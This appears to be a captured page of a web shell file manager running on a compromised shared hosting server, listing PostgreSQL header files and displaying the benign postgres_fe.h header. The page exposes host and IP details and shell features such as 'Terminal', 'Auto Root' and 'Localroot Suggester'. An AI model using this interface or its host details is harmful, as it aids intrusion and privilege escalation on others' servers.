Linux premium323.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
Server IP : 66.29.153.66 & Your IP : 216.73.216.150
Domains :
Cant Read [ /etc/named.conf ]
User : apkbuxzx
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
include /
pgsql /
internal /
Delete
Unzip
Name
Size
Permission
Date
Action
libpq
[ DIR ]
drwxr-xr-x
2026-01-19 17:59
c.h
43.71
KB
-rw-r--r--
2025-11-10 21:59
libpq-int.h
29.54
KB
-rw-r--r--
2025-11-10 21:59
port.h
17.22
KB
-rw-r--r--
2025-11-10 21:59
postgres_fe.h
767
B
-rw-r--r--
2025-11-10 21:59
pqexpbuffer.h
6.22
KB
-rw-r--r--
2025-11-10 21:59
Save
Rename
/*------------------------------------------------------------------------- * * postgres_fe.h * Primary include file for PostgreSQL client-side .c files * * This should be the first file included by PostgreSQL client libraries and * application programs --- but not by backend modules, which should include * postgres.h. * * * Portions Copyright (c) 1996-2020, PostgreSQL Global Development Group * Portions Copyright (c) 1995, Regents of the University of California * * src/include/postgres_fe.h * *------------------------------------------------------------------------- */ #ifndef POSTGRES_FE_H #define POSTGRES_FE_H #ifndef FRONTEND #define FRONTEND 1 #endif #include "c.h" #include "common/fe_memutils.h" #endif /* POSTGRES_FE_H */